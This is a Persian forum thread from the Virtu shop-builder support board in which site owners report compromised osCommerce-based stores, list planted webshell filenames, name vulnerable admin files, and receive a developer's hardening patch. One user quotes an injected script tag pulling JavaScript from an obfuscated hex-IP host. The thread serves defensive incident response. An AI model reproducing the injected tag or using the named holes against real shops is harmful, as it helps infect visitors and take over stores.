انجمن پشتیبانی فروشگاه ساز ویرچو
بررسی فنی مشکلات امنیتی ویرچو - نسخه قابل چاپ

+- انجمن پشتیبانی فروشگاه ساز ویرچو (http://forum.e-virtu.com)
+-- نام بخش: پشتيبانى عمومى از پروژه (/forumdisplay.php?fid=1)
+--- نام بخش: گزارش مشکلات و باگها (/forumdisplay.php?fid=5)
+--- موضوع مبحث: بررسی فنی مشکلات امنیتی ویرچو (/showthread.php?tid=2949)


بررسی فنی مشکلات امنیتی ویرچو - ramindiba - 08-06-1389 07:42 قبل‌ازظهر

دوستان بهتره قید این فروشگاه رو نسخه های بعدی اون رو بخونید.
قرار بود من چند ماه قبل از اشکالات امنیتی این فروشگاه براتون بگم که ماشالله چندین هکر که فکر کنم دستکاری این نوع فروشگاهها رو پروژه دانشجوئی خودشون کردن ، مجال نمیدن که بتونم مطلب بنویسم.
طی دو ماه گذشته من حداقل 5 روش نفوذ و دستکاری در فروشگاه رو پیدا کردم رو رفع کردم اما انگار این حفره ها تمومی نداره و هر روز یه نفوذی با روش مختلفی در فروشگاههای ما دیده میشه.
روشهای نفوذ متنوع هستن و نفرات هک کننده هم مختلف. من به طرق مختلف با تغغیرات در اسکریپتهای سایت و یا سایر روشها هر حفره رو که میبندم یکی دیگه دیده میشه.

فکر کنم باید این نوع فروشگاه رو باید بوسید و گذاشت کنار.

اگه موافق من نیستید برام ایمیل بزنید تا این دوستان هکر رو به سایتهای شما راهنمائی کنم
تا از کارهاشون لذت ببرید.

فعلا !!!Toungue


RE: فاتحه این اسکریپت رو بخونید !!! - Gorgeaseman - 08-06-1389 07:59 قبل‌ازظهر

یه خورده از این حفره ها رو هم واسه ما بفرستید!!! Big Grin

البته اگه میشه!! Wink


RE: فاتحه این اسکریپت رو بخونید !!! - ramindiba - 08-06-1389 08:14 قبل‌ازظهر

دنبال فایل :
shopping_carts.php
captcha_.php
pic_21.php
pic_php.gif
Thumbs.db.php
Hacker Ip.txt
goog1e704795863b2357.php
goog1exxxxxxxxxxxxxx.php
90_1_b_gif.jpg
cn.php
telnet.txt
q_boot.php
att.jpg
aRiAnEt.txt
r5714_php;.jpg
اینو دقت کنید cookie_usage.php( فایل اصلی 3.68 KB هست )
header.php اینم یه سطر با eval(base64_decode داره !
البته من حوصله نکردم بگم که اینها اکثرا تو قسمت ادمین هستن بجز دو سه تا!
اگه دیدید از این نوع فایلها ندارید . آدرس سایتتون رو بدید تا اشاره بدیم براتون بیارن !!!!


RE: فاتحه این اسکریپت رو بخونید !!! - Gorgeaseman - 08-06-1389 08:50 بعدازظهر

نه فعلا از هیچکدوم خبری نیست! Cool

البته ادمین رو زره پوش کردم و خودم هم وقتی میخوام وارد ادمین بشم با هزار بدبختی وارد میشم!! Big Grin

اگر میشه اون دو سه تایی که گفتید نفوذ از ادمین نیست، اونها رو روش پیشگیریشون رو بگید! Wink


RE: فاتحه این اسکریپت رو بخونید !!! - mahsa - 08-07-1389 06:50 قبل‌ازظهر

سلام
اگه ممکنه درباره این مطالبی که به طور خلاصه گفتین یه خورده توضیح بدین
امشب به چند تا از سایت هایی که از کامرس استفاده میکردن حمله شده این دو تا رو من میشناختم صد در صد فروشگاه هایبیشتری هدف قرار گرفتن
http://www.maniyasoft.com/
http://es7.ir

مهاجم ها از سایت http://www.darkdevilz.in بودن که یه سایت ترکی هست.


RE: فاتحه این اسکریپت رو بخونید !!! - Gorgeaseman - 08-07-1389 08:35 قبل‌ازظهر

اونطوری هم حمله نشده! فقط یه فایل html گذاشتن واسه ایندکس! مثلا http://www.maniyasoft.com/index.php همچنان پابرجاست!

البته این فروشگاه ها مسائل امنیتی تابلو رو هم رعایت نکردن!!


RE: فاتحه این اسکریپت رو بخونید !!! - ramindiba - 08-08-1389 03:53 قبل‌ازظهر

دوستان عزیز این دو تا سایت از این نوع اسکریپت نیستند.


RE: فاتحه این اسکریپت رو بخونید !!! - Gorgeaseman - 08-08-1389 04:40 قبل‌ازظهر

بله از فوترش معلوم بود!


RE: فاتحه این اسکریپت رو بخونید !!! - dani - 08-08-1389 07:03 قبل‌ازظهر

ramindiba نوشته شده:
دنبال فایل :
shopping_carts.php
captcha_.php
pic_21.php
pic_php.gif
Thumbs.db.php
Hacker Ip.txt
goog1e704795863b2357.php
goog1exxxxxxxxxxxxxx.php
90_1_b_gif.jpg
cn.php
telnet.txt
q_boot.php
att.jpg
aRiAnEt.txt
r5714_php;.jpg
اینو دقت کنید cookie_usage.php( فایل اصلی 3.68 KB هست )
header.php اینم یه سطر با eval(base64_decode داره !
البته من حوصله نکردم بگم که اینها اکثرا تو قسمت ادمین هستن بجز دو سه تا!
اگه دیدید از این نوع فایلها ندارید . آدرس سایتتون رو بدید تا اشاره بدیم براتون بیارن !!!!


فکر نکنم این کار ایرانی باشه!
شما هکر هارو میشناسید؟


RE: فاتحه این اسکریپت رو بخونید !!! - Gorgeaseman - 08-08-1389 07:25 قبل‌ازظهر

این یکی که خیلی شبیه ایرانیه!! aRiAnEt.txt


RE: فاتحه این اسکریپت رو بخونید !!! - ramindiba - 08-08-1389 08:21 قبل‌ازظهر

دوستان معذرت میخوام کمی گرفتارم اما خیلی زود همه چیز رو براتون مینویسم.
این ایرانی هیچ کاری نتونسته بکنه از اشکال ایتور در ادمین سواستفاده کرده فقط فایل کپی کرده.


RE: فاتحه این اسکریپت رو بخونید !!! - dani - 08-08-1389 07:57 بعدازظهر

ramindiba نوشته شده:
دوستان معذرت میخوام کمی گرفتارم اما خیلی زود همه چیز رو براتون مینویسم.
این ایرانی هیچ کاری نتونسته بکنه از اشکال ایتور در ادمین سواستفاده کرده فقط فایل کپی کرده.


آقا رامین منتظریم شدیدا


RE: فاتحه این اسکریپت رو بخونید !!! - Gorgeaseman - 08-11-1389 02:20 قبل‌ازظهر

کماکان منتظریم! Shy


دلایل من !!! - ramindiba - 08-11-1389 06:59 قبل‌ازظهر

سلام
دوستان آمدم که بعضی مطالب رو راجع به هک شدن این نوع فروشگاهها براتون بگم تا یادم نرفته.

1) اصلی ترین مسئله که تو کنترل سایت بهش برمیخوریم فولدر Images هست. برای ایجاد امنیت تو این فولدر بهترین روش اینکه نزاریم فایلی و اسکریپتی از اونجا اجرا بشه. پس :
یا این [attachment=839]فایل رو اونجا کپی کنید . این کار باعث میشه که اگه به هر نحوی کسی به اون فولدر دسترسی پیدا کرد و فایلی کپی کرد نتونه اجراش کنه .(هر فایلی با ورژنی از PHP و tml|cgi|txt|pl|exe ) .
این کار رو برای هر دو تا فولدر images هم ریشه و هم ادمین انجام بدهید.

2) کار بعدی ما اینکه بعضی فولدر ها رو هم امن کنیم مثلا : فولدر admin برای اینکار بهترین روش اینکه اسم اونو رو با هر چیزی که میخواهیم عوض کنیم. البته برای این کار باید تو فایل config.php تغییراتی هم بدهید. یعنی عبارت admin را با عبارت دلخواهتون عوض کنید. اگه دوست ندارید این کار رو بکنید روش بعدی رو بخونید.

3) از کنترل پانل سایتتون به قسمت Password Protect Directories برید و اگه FrontPage Extensions رو هاستتون نصب نشده باشه میتونید با انتخاب نام فولدر admin قسمت Password protect this directory رو با عبارت admin تیک در آن و نیز اضافه کردن یک نام کلمه عبور و کلمه رمز در پایین آن بهترین امنیت رو برای قسمت مدیریت ایجاد کنید.
من چندین مشکل رو برای این قسمت با روشهای مختلف حل کردم اما باز مسئله پابرجا بود و این بهترین روش هست. چرا ؟ چون موقع ورود به ادمین یه رمز و کلمه عبور میگیره .

حالا چی شد که به فکر ایجاد امنیت تو این قسمت افتادم؟ طی دو ماه گذشته و جالب اینکه مصادف با تغییر سرور خودمون دیدم حملات به سایتها زیاد شده ، کنترل کردم و دیدم که فایلهایی بدون اطلاع من در فولدر images کپی میشن !!!

مورد اول :
اسم برخی رو براتون مییارم :
AmIr-MaGiC.txt در فولدر banner و file و flash . البته این فولدرها به خاطر استفاده از ویرایشگر متنی fckeditor ایجاد شدن.
هر روز من پاک میکردم و کمی کنترل بر روی پرمیژن فولدرها ، اما باز بودن . خوب از قسمت Raw Access Log کنترل پانل پیدا کردم کسی بدون اطلاع من داره از فایلهای موجود test.html و uploadtest.html در admin\fckeditor\editor\filemanager\connectors برای کپی کردن فایلهای موردنظرش استفاده میکنه. حالا چرا این فایلها اونجا بودن؟ چون من به هنگام آپگرید این ویرایشگر یادم رفته بود اونها رو حذف کنم. چون برای نمایش عمکرد آزمایشی این ادیتور به صورت پیش فرض اونجا قرار دارند.

مورد دوم :
یکی از دوستان اعلام کرده بود بدون اطلاع وی به تعداد سازندگان اضافه میشه !!! و بقیه روشهایی رو برای این کار پیشنهاد داده بودن که درست نبود. کنترل کردم و متوجه شدم در یکی از سایتهای من این اتفاق به گونه ای متفاوت رخ داده . یعنی سازنده ای بدون نام ایجاد شده و تصویری وجود نداره. تو ویرایش نام این سازنده متوجه شدم فایلی با نام google xxxxxxxxxx.php وجود داره. البته xxxxx ها یعنی اعداد مختلف. کنترل در ریشه سایت نشون داد که این فایلها در ریشه (root) سایت قرار دارند مثلا با نامهای : goog1e1a677faec98e.php و goog1e70479863b2357.php و نامهای دیگه !!!
البته این فایلهای حاوی دستوراتی برای انتقال فایل بودن که زیاد آنالیزشون نکردم . چیکار کردم؟ اول روی فایل manufacturers.php تو ادمین تغییراتی دادم .(چند تا کد رو اصلاح کردم).

تا اینجا من مورد خطرناکی رو که باعث بشه خطری برای سایت پیش بیاد مشاهده نکرده بودم تا اینکه :

مورد سوم :
اتفاقی به یکی از سایتهام که اتفاقا عملیات امنیتی انجام داده بودم سر زدم و دیدم به جای نام شاخه محصولات عبارت : By Alen نوشته شده !!! و اگه روش کلیک کنی پنجره ای باز میشه و اینو رو مینویسه : Hacked By Shichemt Alen !!! هر چی تو وب گشتم دیدم این یارو کارش چیز دیگه ای بوده و این کار رو صرفا برای خشنودی روح امواتش انجام داده . چون کارش هک های خشن هست و به ما رحم کرده.
تا الان هم کمی جستجو کردم اما نتونستم مطلبی پیدا کنم که از چه باگی این طرف استفاده کرده تا نفوذ کنه.

مورد چهارم :
فایلهای define_language.php و file_manager.php از پوشه admin رو پاک کنید. چون خطای برنامه نویسی دارن و اجازه آپلود و تغییر در فایلها رو هکر میدهند.

موند یه مورد خوش شانسی ما :
تو اکثر فایلهای آپلود شده از دستور eval استفاده شده که توسط سرور ما بلوک میشد و اجرا نمیشد. والا معلوم نبود چی بر سر سایتهامون میامد.

اما چیزی که برای عجیبه با اینکه من تمام مواردامنیتی ( البته بیشتر از اونکی که گفتم رو ) انجام داده بودم باز تو ریشه یکی از سایتها این فایل shopping_carts.php رو دیدم که آنتی ویروس سیستم هم پیداش میکنه ! (یه s بیشتر داره).

این موارد هم برام نامشخصه :
موارد قبلی یه فایلی رو ارسال کردن اما چطوری هکر این فایل farsi_header.php و cookie_usage.php رو دستکاری کرده؟
باینکه فولدر تصاویر رو هم بستم باز فایل تو ریشه کپی میشه؟
من دو تا فایل مورد چهار رو خیلی قبل حذف کرده بودم اما باز فایلها کپی میشدند؟!!!

فعلا که با انجام روش سوم که گفتم کمی از خطرات کم شده اما به محض اینکه فهمیدم بهتون اطلاع میدم .

موفق باشید.


دستمزد من فقط یک کلیک بر روی تشکر هست !!!




RE: فاتحه این اسکریپت رو بخونید !!! - dani - 08-11-1389 07:25 قبل‌ازظهر

اولین فایلی که روی سرور من عوض شده بود cookie_usage بود که به نطرم از فایل define_language این کارو انجام داده یکم سرچ کردم دیدم این فایل رو باید چند ماه پیش باید از سرور پاک میکردم(البته مطمین نیستم از این طریق این کارو کرده یا نه) شما هم سریع این فایل رو پاک کنید


RE: فاتحه این اسکریپت رو بخونید !!! - ramindiba - 08-18-1389 08:05 قبل‌ازظهر

جالبه تو این مدت که این تاپیک رو زدیم بازدید کننده ای به آن صورت نداشته. یعنی امنیت همه برقراره یا اینکه کسی اصلا امنیت لازم ندارن !!!


RE: فاتحه این اسکریپت رو بخونید !!! - Gorgeaseman - 08-18-1389 08:36 قبل‌ازظهر

مسئله این نیست! فروم کم کم داره خالی از سکنه میشه!!!


بررسی فنی مشکلات امنیتی ویرچو - Samad Kushan - 08-18-1389 10:55 بعدازظهر

با سلام
لازم می دانم توضیحات زیر را در مورد بحث انجام گرفته به اطلاع دوستان برسانم، امیدوارم اینگونه بحثها فارغ از هرگونه غرض های شخصی و یا منافع رقابتی صورت گیرد تا باعث پیشرفت هرچه بیشتر این پروژه آزاد گردد.
1- در هنگام بررسی مشکلات امنیتی ویرچو باید موارد زیر را لحاظ قرار دهیم:
الف- هسته ویرچو osc می باشد که توسط هزاران هزار فروشگاه فعال در سراسر جهان استفاده می شود که از آنها می توان به هسته فروشگاه های غولهای نرم افزاری همچون گوگل و موزیلا و اوبونتو و یا linux.com اشاره کرد:
http://www.google-store.com/index.php?cPath=21
http://intlstore.mozilla.org/index.php?cPath=4
http://shop.canonical.com/index.php?cPath=14
http://store.linux.com/index.php?cPath=1
این گستردگی استفاده باعث شده است که این هسته توسط تعداد زیادی از هکر های بسیار حرفه ای به شیوه های مختلف تست امنیتی شود و نمی توان ادعا کرد که مثلا یک فروشگاه ساز x ایرانی که کل فروشگاههایی که تابحال با اون راه اندازی شده به هیچ عنوان بیشتر از 500 تا نیستن و تابه حال توسط حتی یک هکر حرفه ای تست نشده، امن هست چون تابحال گزارش مشکل امنیتی نداشته است.
ب- با توجه به اینکه از انتشار نسخه 1.1.1 مدت زمان زیادی سپری شده است، مشکلات امنیتی معدودی هم که گزارش شده است، باقی مانده است.

2- مشکلات امنیتی گزارش شده شامل 3 مورد به صورت کلی می باشد که از جد پروژه یعنی oscommerce به ارث رسیده است و در اینترنت نیز موجود می باشد که در فایلهای زیر می باشد:
الف- file_manager.php
ب- define_language.php
ج- application_top.php
شایان ذکر می باشد که تمامی این موارد در قسمت مدیریت می باشد و قسمت کاتالوگ فروشگاه برخلاف مطلبی که عنوان شده، مشکل امنیتی ندارد و یا حداقل تا حالا توسط تیم توسعه دهندگان یافت نشده است و یا گزارشی از نفوذ از این قسمت نه برروی فروشگاههای ویرچو و یا osc مشاهده نشده است.
3- یک مشکل امنیتی دیگر نیز وجود دارد، که توسط توسعه دهندگان ویرچو کشف شده و هیچگونه گزارشی از نفوذ از این طریق گزارش نشده است، این مورد نیز مربوط به بخش مدیریت می باشد و برای جلوگیری از سوء استفاده های احتمالی فعلا از ذکر جزئیات آن خودداری می کنیم.
4- مشکلات امنیتی مربوط به سطح دسترسی 777 شاخه images مربوط به تنظیمات نادرست سرور هاست می باشد و نه نرم افزار.
5- موردی که در مورد کپی فایلهای غیر مجاز برروی شاخه اصلی فروشگاه (کاتالوگ) مثلا با نام shopping_carts.php صورت گرفته است نیز احتمالا مربوط به مشکلات امنیتی سرور می باشد و نه نرم افزار.
6- مشکلات مربوط به fckeditor ربطی به ویرچو ندارد چون اصولا در نسخه ای که توسط تیم توسعه دهندگان بصورت رسمی منتشر شده است، از آن استفاده نشده است و حتی در نسخه 1.2 آزمایشی 2 نیز از یک ادیتور دیگر استفاده شده بود و نه fckeditor به نظر می رسد، بحث صورت گرفته برروی یک نسخه خصوصی سازی شده می باشد.
7- مشکلی در فایل cookie_usage یافت ندشه است و بنابراین دلیلی برای حذف این فایل وجود ندارد.
8- با توجه به طولانی شدن بیش از حد پروسه آماده سازی نسخه 1.5 که در آن تمامی مشکلات امنیتی یافت شده رفع شده اند، تیم ویرچو تصمیم گرفته است، یک نسخه میانی در چند روز آینده منتشر کند تا مشکلات امنیتی یافت شده نیز مرتفع شوند، شایان ذکر می باشد که این نسخه تنها مشکلات امنیتی یافت شده را تحت الشعاع قرار می دهد. بنابراین خواهشمند است در صورتیکه مشکل امنیتی ای غیر از مواردی که عنوان شده، وجود دارد، برای هرچه امنتر شدن نسخه میانی گزارش نمایید.
9 – توضیحات تکمیلی در مورد این نسخه میانی در چند روز آتی بعد از جلسه تیم توسعه دهندگان به اطلاع خواهد رسید.
10– در آخر جا دارد از جناب رامین تجلایی که وقت گذاشته اند و این مبحث را ایجاد و مطالب مفیدی را عنوان کرده اند تشکر کنم.
با توجه به اینکه بحث کاملا یک بحث فنی می باشد عنوان مبحث به یک متن با معنی تغییر یافت تا نشان دهنده محتویات آن باشد.
با تشکر
کوشان


RE: بررسی فنی مشکلات امنیتی ویرچو - anf-b - 08-21-1389 06:36 بعدازظهر

با سلام به همه ی دوستان عزیز
در یکی از سایت هام که از ویرچو استفاده شده بود
با توجه به حمله شدید یک سری هکر و ویروسی کردن کل هاست ، سایت Reported Attack Page! شناخته شد
و جالبتر از همه اینه که در فولد images پوشه ای با نام phpMyAdmin-3.3.5.1-english یافت شد که اصلا قابل پاک شدن نیست!
حتی به هاستینگ هم اطلاع دادم ولی اونها هم فقط بخشی از اطلاعات این فولدر رو تونستند پاک کنند


RE: بررسی فنی مشکلات امنیتی ویرچو - Samad Kushan - 08-22-1389 09:30 بعدازظهر

با سلام
با توجه به تنظیمات برخی از سرورها owner فایلها و یا پوشه هایی که با php ایجاد می شوند با owner فایلها و پوشه هایی که با استفاده از پنل هاست ساخته می شوند متفاوت می باشند، و چون حذف اینگونه فایلها و یا پوشه ها باید توسط owner صورت گیرد، اجازه حذف به پنل هاست داده نمی شود.
بسیار عجیب است، که چه طور مسئولین فنی/امنیتی سرور از این سلسه مراتب سطوح دسترسی بدیهی برروی سرور خود مطلع نیستند!
بهرحال برای حذف این گونه فایلها باید اسکریپتی نوشته شود، و با اجرای این اسکریپت اقدام به حذف فایلها و پوشه ها کرد.
البته با توجه به تنظیمات سرور ، ممکن است شما قادر به تغییر نام اینگونه پوشه ها از طریق پنل هاست باشید.


RE: بررسی فنی مشکلات امنیتی ویرچو - anf-b - 08-25-1389 04:36 قبل‌ازظهر

سلام به همه ی آقایون !
دو تا از سایتهام با اینکه تمامیه روش های امنیتی که فرموده بودید رو مو به مو انجام داده بودم همین الان
Reported Attack Page!
شدند

این سایتها:

http://www.sardian.net
http://www.wwepars.com

لطفا یکی راهنمایی کنه


RE: بررسی فنی مشکلات امنیتی ویرچو - Samad Kushan - 08-25-1389 11:22 بعدازظهر

با سلام
نمی دونم شما چه روشهای بازداری استفاده کردید، و آیا اونها کارساز بوده اند یا نه و از کی این روشها رو اعمال کرده اید.
بهرحال باید بدونید که پروسه تایید Reported Attack Page! یک دوره زمانی 90 روزه می باشد برای اطلاعات بیشتر لینکهای زیر را برای مشاهده گزارش گوگل از سایت شما و دلیل اینکه چرا چنین تشخیصی داده است ، بررسی نمایید:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.sardian.net

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.wwepars.com

متاسفانه برای اطمینان از امنیت کامل سایتتون کمی منتظر بمونید تا نسخه میانی منتشر بشه.
موفق باشید


RE: بررسی فنی مشکلات امنیتی ویرچو - anf-b - 08-26-1389 01:00 قبل‌ازظهر

من به سرور اطلاع دادم که بک آپ 10 روز پیش رو لود کنند!
الان هم به گوگل اطلاع دادم تا دوباره سایت رو بازبینی کنه
خدا کنه مشکل فعلا حل بشه




پ.ن:

در فایل Index.php در روت سایت در لاین 36 به یک اسکریپت مجهول برخورد کردم:

کد:
<head><script type="text/javascript" src="http://0xc16aadb7/statistics.js"></script>


لطفا پیگیری کنید


RE: بررسی فنی مشکلات امنیتی ویرچو - anf-b - 08-26-1389 02:39 قبل‌ازظهر

دوستان الان مطمئن شدم مشکل از همون قسمت بود ، چون گوگل هم فقط همین رو به عنوان ویروس شناخته!


RE: بررسی فنی مشکلات امنیتی ویرچو - anf-b - 08-30-1389 07:57 بعدازظهر

آقا یکی بیاد به داد ما برسه ! من همش این پیج index.php رو دوباره آپلود میکنم باز دوباره اون تگ بعد از چند ساعت بهش اضافه میشه
لا اقل یک فروشگاه ساز دیگه معرفی کنید که تا بشه دیتا بیس ویرچو رو بهش کانورت کرد
ممنون


RE: بررسی فنی مشکلات امنیتی ویرچو - ramindiba - 09-01-1389 05:53 قبل‌ازظهر

سلام
با یه برنامه FTP تمام فایلهای داخل هاستت رو برحسب تاریخ مرتب کن و ببین اولین فایلها ( منظورم آخرین تاریخ آپلود فایلها) کدام هستن . احتمالا از یکی از این فایلها دارن اینکار رو میکنن. مخصوصا تو ادمین رو بیشتر بررسی کن . دیدی تاریخ ویرایش فایلها جدید هستن اونها رو کنترل کن و تو هاردت ذخیره کن و برای ما بفرست تا کنترل کنیم. و بعد فایلهای صحیح رو آپلود کن. و بعدش پرمیژن ها رو هم درست کن.
موفق باشی !!!


RE: بررسی فنی مشکلات امنیتی ویرچو - Samad Kushan - 09-01-1389 08:33 بعدازظهر

سلام
پیرو جلسه ای که با حضور توسعه دهندگان ویرچو برگزار شد، پلن نسخه 1.3 تهیه شد که بزودی در دسترس عموم قرار میگیرد.
در این نسخه تمامی مشکلات امنیتی برطرف شده و یکسری امکانات دیگر اضافه می شود و با این حال سعی شده است طوری طرح ریزی شود که در کمترین زمان ممکن این نسخه منتشر شود تا زمان انتشار نسخه 1.5 که طولانی شده است و بسیار متفاوتتتر می باشد نیازهای فعلی استفاده کنندگان ویرچو مرتفع شود.
فعلا برای تمامی دوستانی که سایتهاشون هک شده، پیشنهاد می کنم مراحل زیر را با دقت انجام دهند تا فعلا از لحاظ امنیتی مشکلی نداشته باشند.(برای کسانیکه هنوز سانتشون مورد حمله قرار نگرفته اند نیز پشنهاد می کنم عملیات زیر را از مرحله 5 به بعد اجرا نمایند، که در اینصورت نیازی به اجرای مرحله 7 نیز نخواهد بود)
در واقع مراحل زیر به عنوان راه حل سریع عنوان میشود:

1- مثل همیشه قبل از هرکاری از کل فروشگاهتون نسخه پشتیبان تهیه کنید. تا اگر مشکلی داشتید بتونید براحتی بازیابی نمایید.

2- فایلهای زیر رو داونلود کنید و در جایی ذخیره کنید، (بعد از اینکه کارمون تموم شد این فایلها رو باید جایگزین کنیم):
includes/configure.php
admin/includes/configure.php

3- تمامی فایلها و پوشه های فروشگاه رو غیر از images و download حذف نمایید. در داخل پوشه images تمامی شاخه ها و زیر شاخه ها رو جستجو کنید و تمامی فایلهای php رو حذف کنید.

4- فایلها و پوشه های نسخه 1.1.1 رو غیر از images , dowload آپلود کنید.(در صورتیکه از نسخه 1.2 قبلا استفاده می کردید و یا در کدهای ویرچو تغییراتی داده اید، باید به جای آپلود نسخه 1.1.1 ، از آن نسخه ها باید استفاده نمایید )

5- فایلهای زیر رو حذف نمایید:
admin/define_language.php
admin/file_manager.php

6- تغیرات زیر را در کدهای برنامه انجام دهید:
الف- فایل admin/includes/application_top.php رو با یک ادیتور مناسب باز کنید و در سطر حدودا 223(آخرین سطرهای اسکریپت میباشد ) کد زیر را پیدا کنید:

کد PHP:
if (basename($PHP_SELF) != FILENAME_LOGIN && basename($PHP_SELF) != FILENAME_PASSWORD_FORGOTTEN) {
    
tep_admin_check_login();
  } 

و آنرا با با کد زیر جایگزین نمایید:

کد PHP:
if (!defined(DONOT_CHECK_LOGIN_FALG) || DONOT_CHECK_LOGIN_FALG != 'true') {
    
tep_admin_check_login();
  } 


ب- فایلهای زیر را با یک ادیتور مناسب بازنمایید:
admin/login.php
admin/password_forgotten.php

و قبل از اولین کد اسکریپت یعنی کد زیر:

کد PHP:
require('includes/application_top.php'); 

تکه کد زیر را اضافه نمایید:

کد PHP:
define('DONOT_CHECK_LOGIN_FALG''true'); 


7- آخرین کاری که باید انجام دهید، این است که فایلهای زیر رو با پشتیبانی که در مرحله 2 تهیه کرده اید، جایگزین نمایید:
includes/configure.php
admin/includes/configure.php

در صورتیکه این مراحل رو با موفقیت طی نمایید می توانید به میزان قابل توجهی امنیت سایتتون رو بالا ببرید.

در آخر برای کمک به توسعه نرم افزار لطفا قابلیت Raw Access Log هاست (server's access log) رو طوری تنظیم نمایید که تمامی دسترسیها از این به بعد log شوند، تا در صورتیکه دوباره با مشکل امنیتی مواجه شدید، همین فایلها رو به دپارتمان پشتیانی از طریق ایمیل suppot@e-virtu.com ارسال نمایید تا بررسی شود و راه حل مناسب در اختیار تمامی دوستان قرار داده شود.
با تشکر و احترام
کوشان
دپارتمان پشتیبانی
شرکت فنآوری اطلاعات تاوریژ


RE: بررسی فنی مشکلات امنیتی ویرچو - Gorgeaseman - 09-01-1389 09:27 بعدازظهر

با تشکر از زحماتتون، در مرحله 6ب، منظور از فایل های زیر کدوم فایل هاست؟


RE: بررسی فنی مشکلات امنیتی ویرچو - Samad Kushan - 09-01-1389 09:37 بعدازظهر

با تشکر از گرگ آسمان عزیز، مرحله 6 ب تصحیح شد


RE: بررسی فنی مشکلات امنیتی ویرچو - anf-b - 09-01-1389 10:03 بعدازظهر

با تشکر از شما

جدیدا با اینکه همه سایت خوب بود ولی باز گوگل سایت رو ویروس دار میشناخت
تا اینکه متوجه شدم در پوشه images فایل index.html ویروسیه
موفق باشید


RE: بررسی فنی مشکلات امنیتی ویرچو - anf-b - 09-02-1389 10:06 قبل‌ازظهر

با سلام مجدد خدمت دوستان عزیز

یک راه حل به ذهنم رسیده و اگه هر یکی از دوستان که واسش مقدور لطفا این کد رو آماده کنه تا شاید فعلا این ویروس دست از سر سایتهای ما برداره

لطفا یک کد برای .htaccess بنویسید تا فایل های زیر اصلا لود نشند و یا اینکه کلا خنثی باشند:

http://0xd917077b/touchclarity.js
http://0xc16aadb7/statistics.js

ممنون


RE: بررسی فنی مشکلات امنیتی ویرچو - mehdi4467 - 09-07-1389 02:10 قبل‌ازظهر

سلام چند روز قبل سایت من از طرف ادمین بلاک شد. وقتی دلیل را پرسیدم گفتند به دو علت:
1- یا اسپم فرستاده اید
2- یا یکی از فایلهاتون ویروسی است.

متن کامل دلایل به شرح زیر است:
حالا من نمی دونم واقعا به چه دلیلی این اتفاق افتاده است.

The following report(s) has been sent to us. This report indicates that you or a client of yours could be sending out spam. Locate the issue and fix any problems to prevent further abuse. If we do not hear from you within 24 hours, we will take further action outlined below. Please review the following report(s) and let us know of any actions you take to prevent further abuse.

No Response or Reoccurrence
-------------------------------------
1. Shutting down the reported domain or your account from public access.
2. Account will remain blocked while we discuss the report.

Possible Causes and Solutions
-------------------------------------
1. If you or your client sent out these mailings, please make sure you follow opt-in/opt-out rules. Always send a conformation link through e-mail to confirm adding to your mailing list. Additionally, always honor removal request. Check the report for the reporters e-mail address and remove it from your list. If there is no e-mail, they have chosen to remain anonymous. For more information on the CAN-SPAM Act, please visit here:
http://www.ftc.gov/bcp/conline/pubs/buspubs/canspam.htm

2. You or your client could have installed or has not maintained script/software uploaded to the server. Check the server for any outdated scripts that need to be updated. Most popular outdated scripts are phpbb, php-nuke, formmail, and other send mail type scripts.

3. A virus may have infected you or your clients computer system. Please run a virus scanner on your local computer and all computers that have access to the e-mail being abused.

4. An abuser may have gotten access to a cpanel/ftp/ssh account and used it to login and upload malicious scripts/software to the server or to send unsolicited e-mails. Check your access logs for any suspicious behavior containing information provided in the report.

5. Clear your /tmp directory for any suspicious files and/or run a virus scan on your server to check for any suspicious files.




RE: بررسی فنی مشکلات امنیتی ویرچو - Iranwebco - 11-06-1389 06:00 قبل‌ازظهر

ایا این موارد امنیتی در نسخه virtu_ecommerce_1_2_RC2 رعایت شده یا باید در این نسخه هم موارد ذکر شده را انجام داد ؟


RE: بررسی فنی مشکلات امنیتی ویرچو - Gorgeaseman - 11-06-1389 01:11 بعدازظهر

Iranwebco نوشته شده:
ایا این موارد امنیتی در نسخه virtu_ecommerce_1_2_RC2 رعایت شده یا باید در این نسخه هم موارد ذکر شده را انجام داد ؟


بحث سر همین نسخه هست! باید خودتون آستین بالا بزنید!!! Wink


RE: بررسی فنی مشکلات امنیتی ویرچو - Iranwebco - 11-07-1389 02:09 قبل‌ازظهر

وقتی تیم توسعه این فروشگاه چند ساله که داره با این سیستم کار میکنه و نمیتونه باگهای امنیتی شو رفع کنه از کاربرهای عادی و منو شما چه انتظاری هست ؟
وقتشه که بریم سراغ یک فروشگاه دیگه


RE: بررسی فنی مشکلات امنیتی ویرچو - Gorgeaseman - 11-07-1389 06:04 قبل‌ازظهر

Iranwebco نوشته شده:
وقتی تیم توسعه این فروشگاه چند ساله که داره با این سیستم کار میکنه و نمیتونه باگهای امنیتی شو رفع کنه از کاربرهای عادی و منو شما چه انتظاری هست ؟
وقتشه که بریم سراغ یک فروشگاه دیگه


مشکل حل نشدنی ای وجود نداره! تیم توسعه هم که به پنل هاست شما دسترسی نداره! پس باید بعضی کارها رو خودتون انجام بدید و روش بقیه کارها هم که گفته شده! یکم وقت و حوصله میخواد فقط! و پیشگیری، نه درمان!!!

در ضمن فروشگاه های دیگه به مراتب اوضاعشون بدتره! osc هم به خاطر اینکه هزاران کاربر در سراسر دنیا داره هکرهای زیادی روش کار کردند و راه های نفوذی رو هم پیدا کردند که بیشترشون قابل حلله! اما روی فروشگاه ساز های دیگه و مخصوصا مخصوصا فروشگاه ساز های ایرانی الاصل ! کسی به صورت جدی کار نکرده که راه های نفوذش رو پیدا کنه واللا اگه هکری به صورت جدی بخواد کار کنه حتما باگی پیدا میکنه که فروشگاه رو نابود کنه! Wink


RE: بررسی فنی مشکلات امنیتی ویرچو - Iranwebco - 11-08-1389 02:28 قبل‌ازظهر

باگ که همه دارن ولی به همون دلیلی که گفتید باید رفت سراغ شاپ های ایرانی که کسی نیاد سراغش


RE: بررسی فنی مشکلات امنیتی ویرچو - Gorgeaseman - 11-08-1389 07:19 قبل‌ازظهر

من فروشگاه هایی رو که کلا هسته ایرانی دارند توصیه نمیکنم! حداقل از فروشگاه ترجمه شده دیگه استفاده کنید!


توصیه من بود! اختیار با شماست!!! ولی باز هم میگم osc نسبتا بالاتر از همست!


RE: بررسی فنی مشکلات امنیتی ویرچو - ramindiba - 01-07-1390 07:05 قبل‌ازظهر

دوستان باز به تازگی کسی شروع به حملات به سایتتها کرده که برخی از آی پی هاشون اینهاست :
